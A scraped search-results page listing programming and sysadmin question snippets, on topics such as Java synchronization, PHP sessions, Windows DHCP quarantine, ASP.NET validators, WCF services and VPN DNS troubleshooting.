Search Results

Search found 22756 results on 911 pages for 'cisco vpn client'.

Page 462/911 | < Previous Page | 458 459 460 461 462 463 464 465 466 467 468 469  | Next Page >

  • notify listener inside or outside inner synchronization

    - by Jary Zeels
    Hello all, I am struggling with a decision. I am writing a thread-safe library/API. Listeners can be registered, so the client is notified when something interesting happens. Which of the two implementations is most common? class MyModule { protected Listener listener; protected void somethingHappens() { synchronized(this) { ... do useful stuff ... listener.notify(); } } } or class MyModule { protected Listener listener; protected void somethingHappens() { Listener l = null; synchronized(this) { ... do useful stuff ... l = listener; } l.notify(); } } In the first implementation, the listener is notified inside the synchronization. In the second implementation, this is done outside the synchronization. I feel that the second one is advised, as it makes less room for potential deadlocks. But I am having trouble to convince myself. A downside of the second imlementation is that the client might receive 'incorrect' notifications, which happens if it accessed the module prior to the l.notify() statement. thanks a lot

    Read the article

  • Very slow remote page load performance in QtWebKit (Windows)

    - by Gil
    I get very slow load times on QtWebKit on Windows 7, through ADSL. I am using the Qt Demo Browser, on a Core2 Quad, 64 bit Windows 7, 4GB ram, 2gb processor. through a VPN. Simplest example: google search page takes ~18 seconds to load, compared to 2.5 on Chrome (cash cleared). On larger pages, with scripts etc. it is worse. I tried Qt 4.6 and also the Qt 4.7 beta, but don't see any difference. I see the same results with Arora browser. Are there any settings, or patches that can be applied to fix this? Thanks

    Read the article

  • How should I implement lazy session creation in PHP?

    - by Adam Franco
    By default, PHP's session handling mechanisms set a session cookie header and store a session even if there is no data in the session. If no data is set in the session then I don't want a Set-Cookie header sent to the client in the response and I don't want an empty session record stored on the server. If data is added to $_SESSION, then the normal behavior should continue. My goal is to implement lazy session creation behavior of the sort that Drupal 7 and Pressflow where no session is stored (or session cookie header sent) unless data is added to the $_SESSION array during application execution. The point of this behavior is to allow reverse proxies such as Varnish to cache and serve anonymous traffic while letting authenticated requests pass through to Apache/PHP. Varnish (or another proxy-server) is configured to pass through any requests without cookies, assuming correctly that if a cookie exists then the request is for a particular client. I have ported the session handling code from Pressflow that uses session_set_save_handler() and overrides the implementation of session_write() to check for data in the $_SESSION array before saving and will write this up as library and add an answer here if this is the best/only route to take. My Question: While I can implement a fully custom session_set_save_handler() system, is there an easier way to get this lazy session creation behavior in a relatively generic way that would be transparent to most applications?

    Read the article

  • Microsoft Windows DHCP: Steering IPv4 clients into specific scopes based on MAC

    - by Easter Sunshine
    We have visitors on our campus who bring their own laptops and devices and use our wireless and wired networks. When we receive a copyright infringement notice (typically BitTorrenting), we are required to quarantine that MAC address so that it no longer has Internet access. No matter what website it tries to visit, it is sent to a web page explaining to the user that the device has been quarantined. We have thus far implemented this in ISC DHCP on Linux. We have multiple VLANs with one or more public-IP subnets and one RFC1918 quarantine subnet each. All clients are leased IPs in the public-IP subnet(s) unless you're in a list of known bad MACs. Then, you are sent to the quarantine subnet so that your traffic is unroutable on the Internet (you are isolated by subnet only, not by VLAN). We would like to move to Windows DHCP in light of the IPAM role but I cannot figure out how to replicate this in Windows DHCP 2012 (Assign DHCP IPs for specific MAC prefixes on Windows Server 2008 R2 suggests it was not possible in 2008 R2), even while using policies. So here's what I'd like: The administrator/help desk provides and maintains a list of MAC addresses that are to be quarantined. The DHCP server places those MACs into the quarantine subnet on the respective VLAN, no matter which VLAN the client is in. I don't think reservations would work: We currently have about 300 registered bad MACs and about 12 VLANs. I don't want to make 300 x 12 reservations nor have to add 12 reservations per new MAC address. Not to mention all of the quarantine subnets are /24s. We do not have NPS/NAC. You do not have to register your MAC address get network access. We use Cisco routers/switches. Thanks.

    Read the article

  • How do you clear a CustomValidator Error on a Button click event?

    - by George
    I have a composite User control for entering dates: The CustomValidator will include server sided validation code. I would like the error message to be cleared via client sided script if the user alters teh date value in any way. To do this, I included the following code to hook up the two drop downs and the year text box to the validation control: <script type="text/javascript"> ValidatorHookupControlID("<%= ddlMonth.ClientID%>", document.getElementById("<%= CustomValidator1.ClientID%>")); ValidatorHookupControlID("<%= ddlDate.ClientID%>", document.getElementById("<%= CustomValidator1.ClientID%>")); ValidatorHookupControlID("<%= txtYear.ClientID%>", document.getElementById("<%= CustomValidator1.ClientID%>")); </script> However, I would also like the Validation error to be cleared when the user clicks the clear button. When the user clicks the Clear button, the other 3 controls are reset. To avoid a Post back, the Clear button is a regular HTML button with an OnClick event that resets the 3 controls. Unfortunately, the ValidatorHookupControlID method does not seem to work on HTML controls, so I thought to change the HTML Button to an ASP button and to Hookup to that control instead. However, I cannot seem to eliminate the Postback functionality associated by default with the ASP button control. I tried to set the UseSubmitBehavior to False, but it still submits. I tried to return false in my btnClear_OnClick client code, but the code sent to the browser included a DoPostback call after my call. btnClear.Attributes.Add("onClick", "btnClear_OnClick();") Instead of adding OnClick code, I tried overwriting it, but the DoPostBack code was still included in the final code that was sent to the browser. What do I have to do to get the Clear button to clear the CustomValidator error when clicked and avoid a postback? btnClear.Attributes.Item("onClick") = "btnClear_OnClick();"

    Read the article

  • What harm can javascript do?

    - by The King
    I just happen to read the joel's blog here... So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site. Since javascript runs on client end. All it can access or do is only on the client end. It can read informations stored in hidden fields and change them. It can read, write or manipulate cookies... But I feel, these informations are anyway available to him. (if he is smart enough to pass javascript in a textbox. So we are not empowering him with new information or providing him undue access to our server... Just curious to know whether I miss something. Can you list the things that a malicious user can do with this security hole. Edit : Thanks to all for enlightening . As kizzx2 pointed out in one of the comments... I was overlooking the fact that a JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.

    Read the article

  • Creating a single CRM plugin DLL to store in the CRM database

    - by Shaamaan
    Since the suggested way of storing plugins in MS CRM is via the CRM database, I figured it's about time to do something about the method I'm currently using, which is storing the DLLs on the disk. The trouble however is that I don't know how to embed all the other various bits that are needed by the DLL: the localization resource files (which are kept in another folder) and some referenced DLLs from the latest SDK (which had to be manually placed in the bin\assembly folder). At this point, I'm not even entirely sure this is possible. So far I've tried to solve the localization problem by changing the build action on the resource files to "Content" or "Resource" and tested this solution (still keeping the location on-disk, but without the added localization folder). This didn't work: when I purposely generated a validation error in one of the plugins, I got the default language message (English) despite having a different language selected in the CRM. I've faced a similar problem when trying to add some of the referenced DLL files (namely the new SDK DLLs: xrm.portal, xrm.portal.files and xrm.client). When I tried to store the plugin in the database (skipping for a moment the localization issue), I got a CRM error saying it cannot find the XRM.Client assembly or one of it's dependencies. I know I could use ILMerge to put the whole thing together, but I've got a gut feeling telling me this isn't really a good idea. Any hints or suggestions on this issue would be great.

    Read the article

  • Rewriting Live TCP Streams

    - by user213060
    I want to rewrite TCP/IP streams. Ettercap's etterfilter command lets you perform simple live replacements of TCP/IP data based on fixed strings or regexes. Example: http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 I would like to rewrite streams based on my own filter program instead of just simple string replacements. Anyone have an idea of how to do this? Is there anything other than Ettercap that can do live replacement like this, maybe as a plugin to a VPN software or something? Thanks!

    Read the article

  • Response.Redirect() will not redirect on Internet Explorer

    - by Amit
    Hi, I am using Response.Redirect("someurl",true); in the page_preInit event to redirect all the requests that come to a page. It works fine on Firexox, but if i access the page from internet explorer 7/8, it says page can not be found and will not redirect to new URL. Any idea why this happens?? Update: I tried giving a radom URL in the redirect such as google.com and it works fine. Actually the URL I am trying to redirect is not accessible on my machine, it is on another VPN. I guess IE will not change the URL on the addressbar if it can not access the URL. Firefox on the other hand changes the address on the address bar.

    Read the article

  • What issues to consider when rolling your own data-backend for Silverlight / AJAX on non-ASP.NET ser

    - by Edward Tanguay
    I have read-only Silverlight and AJAX apps which read static text and XML files from a PHP/Apache server, which works very nicely with features such as asynchronous loading, lazy-loading only what I need for each page, loading in the background, developed a little query language to get a PHP script to create custom XML files etc. it's pragmatic read-only REST, and all works fast and fine for read-only sites. Now I want to also add the ability to write data from these apps to a database on the same PHP/Apache server. For those of you who have built similar data-access layers, what do I need to consider while building this, especially regarding security so that not just any client can write and alter my database, e.g.: check HTTP_USER_AGENT for security check REMOTE_ADDR for security require a special code for security, perhaps a list of TAN codes (such as banks use for online transactions) each which can only be used once, both the client and server have these I wonder if there is some kind of standard REST query I should lean on for e.g. building SQL-like statements in the URL parameters, e.g. http://www.thedatalayersite.com/query?insertinto=customers&... Any thoughts, notes from experience, ideas, gotchas, especially ideas on tightening down security in this endeavor would be helpful.

    Read the article

  • VS2010 and CSS: What is the best strategy to individually position form controls

    - by George
    OK, I have a ton of controls on my page that I need to individually place. I need to set a margin here, a padding there, etc. None of these particular styles that I want to apply will be applied to more than control. What is the bets practice for determining at which level the style is placed, etc? OK, my choices are 1) External CSS file 1A) Using ClientIdMode = Auto (the default) I could assign a unique CssClass value to the ASP.NET control and, in the external CSS file, create a class selector that would only be applied to that one control. 1B) User Client ID = Predicatable In the external CSS file, I could determine what the ID will be for the controls of interest and create an ID selector (#ControlID{Style} ). However, I fear maintenance issues due to including/removing parent containers that would cause the ID to change. 1C) User Client ID = Static. I could choose static IDs for the controls such that I minimize the likelihood of a clash with auto generated IDs (perhaps by prefixing the ID with "StaticID_" and use an external stylesheet with ID selectors. 2) I could place the style right on the control. The only disadvantage here, as I see it, is that style info is brought down each time instead of being cached , which is what I'd get using an external CSS. If a style isn't resused, I personally don't see much benefit to placing it in an external file, though please explain why if you disagree. Is there moire of a reason that "It's nice to have all the CSS in one place?"

    Read the article

  • Django sphinx works only after app restart.

    - by Lhiash
    Hi, I've set up django-sphinx in my project, which works perfectly only for some time. Later it always returns empty result set. Surprisingly restarting django app fixes it. And search works again but again only for short time (or very limiter number of queries). Heres my sphinx.conf: source src_questions { # data source type = mysql sql_host = xxxxxx sql_user = xxxxxx #replace with your db username sql_pass = xxxxxx #replace with your db password sql_db = xxxxxx #replace with your db name # these two are optional sql_port = xxxxxx #sql_sock = /var/lib/mysql/mysql.sock # pre-query, executed before the main fetch query sql_query_pre = SET NAMES utf8 # main document fetch query sql_query = SELECT q.id AS id, q.title AS title, q.tagnames AS tags, q.html AS text, q.level AS level \ FROM question AS q \ WHERE q.deleted=0 \ # optional - used by command-line search utility to display document information sql_query_info = SELECT title, id, level FROM question WHERE id=$id sql_attr_uint = level } index questions { # which document source to index source = src_questions # this is path and index file name without extension # you may need to change this path or create this folder path = /home/rafal/core_index/index_questions # docinfo (ie. per-document attribute values) storage strategy docinfo = extern # morphology morphology = stem_en # stopwords file #stopwords = /var/data/sphinx/stopwords.txt # minimum word length min_word_len = 3 # uncomment next 2 lines to allow wildcard (*) searches min_infix_len = 1 enable_star = 1 # charset encoding type charset_type = utf-8 } # indexer settings indexer { # memory limit (default is 32M) mem_limit = 64M } # searchd settings searchd { # IP address on which search daemon will bind and accept # optional, default is to listen on all addresses, # ie. address = 0.0.0.0 address = 127.0.0.1 # port on which search daemon will listen port = 3312 # searchd run info is logged here - create or change the folder log = ../log/sphinx.log # all the search queries are logged here query_log = ../log/query.log # client read timeout, seconds read_timeout = 5 # maximum amount of children to fork max_children = 30 # a file which will contain searchd process ID pid_file = searchd.pid # maximum amount of matches this daemon would ever retrieve # from each index and serve to client max_matches = 1000 } and heres my search part from views.py: content = Question.search.query(keywords) if level: content = content.filter(level=level)#level is array of integers There are no errors in any logs, it just isnt returning any results. All help would be most appreciated.

    Read the article

  • svn commit is hung at start of commit

    - by jwhitlock
    I'm commiting a large changeset, including a large binary file (180 MB) over a slow VPN connection. It looks for all the world like it is stalled. How can I diagnose where it is stuck? The output is: $ svn commit -m "My commit message" Connecting to deprecated signal QDBusConnectionInterface::serviceOwnerChanged(QString,QString,QString)` Local subversion is 1.6.9 on Linux, KDE 4.3, and svn status shows ML . L ws M ws/manage.py L ws/locales L ws/locales/ja_JP L ws/locales/ja_JP/LC_MESSAGES The process isn't using much of any resources. The server is Linux, served by Apache and mod_dav_svn, same subversion 1.6.9. I can't see any process that is handling the commit.

    Read the article

  • Call WCF Service Through Javascript, AJAX, or JQuery

    - by obautista
    I created a number of standard WCF Services (Service Contract and Host (svc) are in separate assemblies). I fired up a Web Site in IIS to host the Services (i.e., address is http://services:1000/wcfservices.svc). Then in my Web Site project I added the reference. I am able to call the services normally. I am needed to call some of the services client side. Not sure if I should be looking at articles calling WCF services through AJAX, JQuery, or JSON enabled WCF Services. Can anyone provide any thoughts or experience with configuring as such? Some of the changes I made was adding the following to the Operation Contract: [OperationContract] [WebInvoke(Method = "POST", UriTemplate = "SetFoo")] void SetFoo(string Id); Then this above the implementation of the interface: [AspNetCompatibilityRequirements(RequirementsMode = AspNetCompatibilityRequirementsMode.Allowed)] Then in the service webconfig I have this (parens are angle brackets): <serviceHostingEnvironment aspNetCompatibilityEnabled="true"> <baseAddressPrefixFilters> <add prefix="http://services:1000/wcfservices.svc/"/>> </baseAddressPrefixFilters> </serviceHostingEnvironment> <serviceHostingEnvironment multipleSiteBindingsEnabled="false" /> Then in the client side I attempted this: <asp:ScriptManagerProxy ID="ScriptManagerProxy1" runat="server"> <compositeScript> <Scripts> <asp:ScriptReference Path="http://Flixsit:1000/FlixsitWebServices.svc" /> </Scripts> </CompositeScript> </asp:ScriptManagerProxy> I am attempting to call the service like this in javascript: wcfservices.SetFoo(string Id); Nothing is working. If it is idea or a better solution to call JSON enable, JQuery, etc....I am willing to make any changes. Thanks for any suggestions/tips provided....

    Read the article

  • Which JavaScript framework for me?

    - by LeonixSolutions
    This is not to be a subjective question; nor is it intended to start a religious war. Which JavaScript framework for me? Until now, I haven't coded any JS at all (no biggy, it's just another language). I have been set in my ways and eschewed any client-side code, lest the user have JS turned off, or try to "just change this a little, to see what happens" - and then expect me to support it. So, until now it has all been server-side, with PHP and an ODBC compliant database. However, I am beginning to see advantages to client-side input validation and improved graphical experience for users which would help me to produce more professional web-based applications. I am looking for a framework which : doesn't have a steep learning curve is full-featured, although that does not mean that the one with the most features wins (remember the 80/20 rule) is mature an stable (even if still in development) integrates well with common IDEs if possible. I use NetBeans for PHP (and occasionally MS visual studio for C# (I seem to have drifted away from Eclipse)) allows me to develop web sites/apps for mobile devices support for Goggle charts (or other charting) would be a bonus has good AJAX/JSON support, but I imagine that they all do Taking that into consideration, is there a "right" framework for me, or does it not really matter? I looked briefly at JQuery and JQueryGui and liked what I saw, but I really don't have time, owing to deadlines, to try them all out and see which one suits me, much as I know that I ought to.

    Read the article

  • Shoulda and Paperclip testing

    - by trobrock
    I am trying to test a couple models that have an attachment with Paperclip. I have all of my validations passing except for the content-type check. # myapp/test/unit/project_test.rb should_have_attached_file :logo should_validate_attachment_presence :logo should validate_attachment_size(:logo).less_than(1.megabyte) should_validate_attachment_content_type :logo, :valid => ["image/png", "image/jpeg", "image/pjpeg", "image/x-png"] # myapp/app/models/project.rb has_attached_file :logo, :styles => { :small => "100x100>", :medium => "200x200>" } validates_attachment_presence :logo validates_attachment_size :logo, :less_than => 1.megabyte validates_attachment_content_type :logo, :content_type => ["image/png", "image/jpeg", "image/pjpeg", "image/x-png"] The errors I am getting: 1) Failure: test: Client should validate the content types allowed on attachment logo. (ClientTest) [/Library/Ruby/Gems/1.8/gems/thoughtbot-shoulda-2.10.2/lib/shoulda/assertions.rb:55:in `assert_accepts' vendor/plugins/paperclip/shoulda_macros/paperclip.rb:44:in `__bind_1276100387_499280' /Library/Ruby/Gems/1.8/gems/thoughtbot-shoulda-2.10.2/lib/shoulda/context.rb:351:in `call' /Library/Ruby/Gems/1.8/gems/thoughtbot-shoulda-2.10.2/lib/shoulda/context.rb:351:in `test: Client should validate the content types allowed on attachment logo. ']: Content types image/png, image/jpeg, image/pjpeg, image/x-png should be accepted and rejected by logo This happens on two different models that are set up the same way.

    Read the article

  • Any HTTP proxies with explicit, configurable support for request/response buffering and delayed conn

    - by Carlos Carrasco
    When dealing with mobile clients it is very common to have multisecond delays during the transmission of HTTP requests. If you are serving pages or services out of a prefork Apache the child processes will be tied up for seconds serving a single mobile client, even if your app server logic is done in 5ms. I am looking for a HTTP server, balancer or proxy server that supports the following: A request arrives to the proxy. The proxy starts buffering in RAM or in disk the request, including headers and POST/PUT bodies. The proxy DOES NOT open a connection to the backend server. This is probably the most important part. The proxy server stops buffering the request when: A size limit has been reached (say, 4KB), or The request has been received completely, headers and body Only now, with (part of) the request in memory, a connection is opened to the backend and the request is relayed. The backend sends back the response. Again the proxy server starts buffering it immediately (up to a more generous size, say 64KB.) Since the proxy has a big enough buffer the backend response is stored completely in the proxy server in a matter of miliseconds, and the backend process/thread is free to process more requests. The backend connection is immediately closed. The proxy sends back the response to the mobile client, as fast or as slow as it is capable of, without having a connection to the backend tying up resources. I am fairly sure you can do 4-6 with Squid, and nginx appears to support 1-3 (and looks like fairly unique in this respect). My question is: is there any proxy server that empathizes these buffering and not-opening-connections-until-ready capabilities? Maybe there is just a bit of Apache config-fu that makes this buffering behaviour trivial? Any of them that it is not a dinosaur like Squid and that supports a lean single-process, asynchronous, event-based execution model? (Siderant: I would be using nginx but it doesn't support chunked POST bodies, making it useless for serving stuff to mobile clients. Yes cheap 50$ handsets love chunked POSTs... sigh)

    Read the article

  • Pros and cons of MPMoviePlayerController versus launching UIWebView to stream movie

    - by Nosredna
    I have a client who has video content for the web in Flash format. My task is to help them show the videos in an iPhone app. I realize that step one is to get these videos into the appropriate Quicktime format for the iPhone. Then I'm going to have to help the client figure out how or where to host these files. If that's tricky I assume they can be hosted at YouTube. My chief concern, though, is which approach to take to stream the video. What are the pros and cons of MPMoviePlayerController versus launching UIWebView with the URL of the stream? Is there any difference? Is one of them more or less forgiving? Is one of them a better user experience? Any gotchas I might expect to run into? I'm assuming playing video is pretty easy on the iPhone. Is it reasonable to try both and have one available as a fallback, or would that be a waste of time? I'm trying to schedule this out a bit, so I'd love to hear real-world experiences from anyone who's done this.

    Read the article

  • Multiple, Simultaneous Factories and Protocols in Twisted: Same Service, Different Ports

    - by RichardCroasher
    Greetings, Forum. I'm working on a program in Python that uses Twisted to manage networking. The basis of this program is a TCP service that is to listen for connections on multiple ports. However, instead of using one Twisted factory to handle a protocol object for each port, I am trying to use a separate factory for each port. The reason for this is to force a separation among the groups of clients connecting to the different ports. Unfortunately, it appears that this architecture isn't quite working: clients that connect to one port appear to be available among all the factories (e.g., the protocol class used by each factory includes a 'self.factory.clients.append (self)' statement...instead of adding a given client to just the factory for a particular port, the client is added to all factories), and whenever I shutdown service on one port the listeners on all ports also stop. I've been working with Twisted for a short while, and fear I simply don't fully understand how its factory classes are managed. My question is: is it simply not possible to have multiple, simultaneous instances of the same factory and same protocol in use across different ports (without these instances stepping on each other's toes)?

    Read the article

  • DNS requests failing from computers that can ping DNS server

    - by dunxd
    I have a situation where computers in some of our remote offices from time to time lose the ability to use our DNS server (in head office) to resolve hostnames. The offices are connected via VPN using Cisco ASA 5505 (VPNclient config rather than Site to Site). Ping to the IP address of the DNS server works. But nslookup will get a "no response from server" message. Computers in other locations can use DNS fine. This is an intermittent problem. One day/hour it works, another it doesn't. Other offices connected in the same way work when another doesn't. No config changes have been made on routers around the time we see the problem. Some users have reported that the problem goes away after doing a repair connection in Windows XP. I think this could be caused by the DNS cache being flushed as part of this - the Windows DNS cache makes the intermittent problem look less so because it caches failed lookups as well as successful ones. However, it is possible some other aspect of Windows is involved. Windows 7 clients have also had the same problem. Any pointers on deeper troubleshooting, or anyone else found this?

    Read the article

  • Exception Handling in ASP.NET MVC and Ajax - [HandleException] filter

    - by Graham
    All, I'm learning MVC and using it for a business app (MVC 1.0). I'm really struggling to get my head around exception handling. I've spent a lot of time on the web but not found anything along the lines of what I'm after. We currently use a filter attribute that implements IExceptionFilter. We decorate a base controller class with this so all server side exceptions are nicely routed to an exception page that displays the error and performs logging. I've started to use AJAX calls that return JSON data but when the server side implementation throws an error, the filter is fired but the page does not redirect to the Error page - it just stays on the page that called the AJAX method. Is there any way to force the redirect on the server (e.g. a ASP.NET Server.Transfer or redirect?) I've read that I must return a JSON object (wrapping the .NET Exception) and then redirect on the client, but then I can't guarantee the client will redirect... but then (although I'm probably doing something wrong) the server attempts to redirect but then gets an unauthorised exception (the base controller is secured but the Exception controller is not as it does not inherit from this) Has anybody please got a simple example (.NET and jQuery code). I feel like I'm randomly trying things in the hope it will work Exception Filter so far... public class HandleExceptionAttribute : FilterAttribute, IExceptionFilter { #region IExceptionFilter Members public void OnException(ExceptionContext filterContext) { if (filterContext.ExceptionHandled) { return; } filterContext.Controller.TempData[CommonLookup.ExceptionObject] = filterContext.Exception; if (filterContext.HttpContext.Request.IsAjaxRequest()) { filterContext.Result = AjaxException(filterContext.Exception.Message, filterContext); } else { //Redirect to global handler filterContext.Result = new RedirectToRouteResult(new RouteValueDictionary(new { controller = AvailableControllers.Exception, action = AvailableActions.HandleException })); filterContext.ExceptionHandled = true; filterContext.HttpContext.Response.Clear(); } } #endregion private JsonResult AjaxException(string message, ExceptionContext filterContext) { if (string.IsNullOrEmpty(message)) { message = "Server error"; //TODO: Replace with better message } filterContext.HttpContext.Response.StatusCode = (int)HttpStatusCode.InternalServerError; filterContext.HttpContext.Response.TrySkipIisCustomErrors = true; //Needed for IIS7.0 return new JsonResult { Data = new { ErrorMessage = message }, ContentEncoding = Encoding.UTF8, }; } }

    Read the article

  • When connecting SAP Business One to SQL Server 2005, what is the

    - by Nick
    we have SAP Business One - Fourth Shift Edition running here at a small manufacturing company. The consulting company that has come in to do the installation/implementation uses the "sa" id/pass to initially connect to the database to get the list of companies. From then on, I have to assume that its the sa id/pass that is being used to connect the client software to the database. Is this appropriate? I dont know where this data is being stored... as an ODBC connection? directly in the registry somewhere? Is it secure? Would it be better to set the users network ID in the database security and then use the "trusted connection" setting instead? Or do most people create a separate login in the database for each user and use that in the client settings? seems like the easiest way would be to add the users network login to the sql server security so they can use the "trusted connection"... but then wouldn't that allow ANY software to connect to the database from that machine? So anyways: what are the best-practices for setting this up?

    Read the article

  • Cascading input control is empty while accessing a Jasper Report

    - by Yogesh R
    I call a jasper report through an independent URL through which I pass one of the input controls needed to run the report. E.g. http:// localhost:8080/jasperserver/flow.html?_flowId=viewReportFlow&standAlone=true&reportUnit=xyz&ParentFolderUri=abcd&j_username=xyz&j_password=xyz&parameter1=value1& . . . As you can see in the URL, I pass the JasperServer username and password, reportUnit name and location and other mandatory parameters, along with the report input parameter, i.e., "parameter1" which can have a value like "value1". I used a mandatory, read-only and visible input control for this input value. Its value would come from the URL, showed in the box but was read-only and hence could not be changed. The report was working absolutely fine upto this point. But the tragedy began when my client rejected this idea. He wanted a completely invisible input control to my report and the input value would be passed through the URL, just like illustrated above. And then my client asked me to refer to this and made me work on cascading input controls. Recently I added a cascading input control to this report. The input control type is a single select query, which utilizes two parameters that I pass to the report through the URL. Now when the Jasper server responds to the URL with the input parameters, all the other static parameters work properly, except for the cascaded one. When I click the select box of the cascaded input, I can see the desired options for a second, and then, it just goes empty while I'm viewing the select list. But when I make the "Parameter1" input control visible, the cascading input control works! And then I turn in invisible, the cascading input control turns into a beast that does things by itself and not listen to his master. I am not able to understand why this is happening. Could anybody please provide me a solution to this?

    Read the article

  • POSTing JSON data to WCF REST

    - by Randall Sexton
    I'm trying to send data from a client application using jQuery to a REST WCF service based on the WCF REST starter kit. Here's what I have so far. Service Definition: [WebHelp(Comment = "Save PropertyValues to the database")] [WebInvoke(Method = "POST", UriTemplate = "PropertyValues_Save", BodyStyle = WebMessageBodyStyle.WrappedRequest, RequestFormat = WebMessageFormat.Json, ResponseFormat = WebMessageFormat.Json)] [OperationContract] public bool PropertyValues_Save(Guid assetId, Dictionary<Guid, string> newValues) { ... } Call from the client: $.ajax({ url:SVC_PROPERTYVALUES_SAVE, type: "POST", contentType: "application/json; charset=utf-8", data: jsonData, dataType: "json", error: function(XMLHttpRequest, textStatus, errorThrown) { alert(textStatus + ' ' + errorThrown); }, success: function(data) { if (data) { alert('Values saved'); $("#confirmSubmit").dialog('close'); } else { alert('Values failed to save'); $("#confirmSubmit").dialog('close'); } } }); Example of the JSON being passed: { "assetId": "d70714c3-e403-4cc5-b8a9-9713d05b2ee0", "newValues": [ { "key": "bd01aa88-b48d-47c7-8d3f-eadf47a46680", "value": "0e9fdf34-2d12-4639-8d70-19b88e753ab1" }, { "key": "06e8eda2-a004-450e-90ab-64df357013cf", "value": "1d490aec-f40e-47d5-865c-07fe9624f955" } ] } I'm using Windows Authentication on the virtual directory. When I call operations that are GETs, everything is fine. This code is prompting the browser to log in. When I enter my credentials, I simply get an alert in my browser which says "error undefined". Even if you can't help my specific error, do you see anything that looks wrong from glancing? I've been beating my head on this nearly all day. Thanks in advance.

    Read the article

  • advice on working on remote asp.net applications

    - by Jonesy
    Hi folks, I'm a (relatively new) developer using asp.net with VB.NET. Currently all my applications are developed on my PC and then are built and moved onto the web server. I'm going to be working remotely for 3 months in which time I'll be connecting to the company network via VPN. What is the best way to access my projects? I need to have the projects stored on the company network so that others can access them too. So simply copying the projects to my laptop, working on them, then copying them back won't suffice. I tried to just open the projects off of the network share but am getting application trust problems. I'm just wondering what other developers do in this situation? Jonesy

    Read the article

< Previous Page | 458 459 460 461 462 463 464 465 466 467 468 469  | Next Page >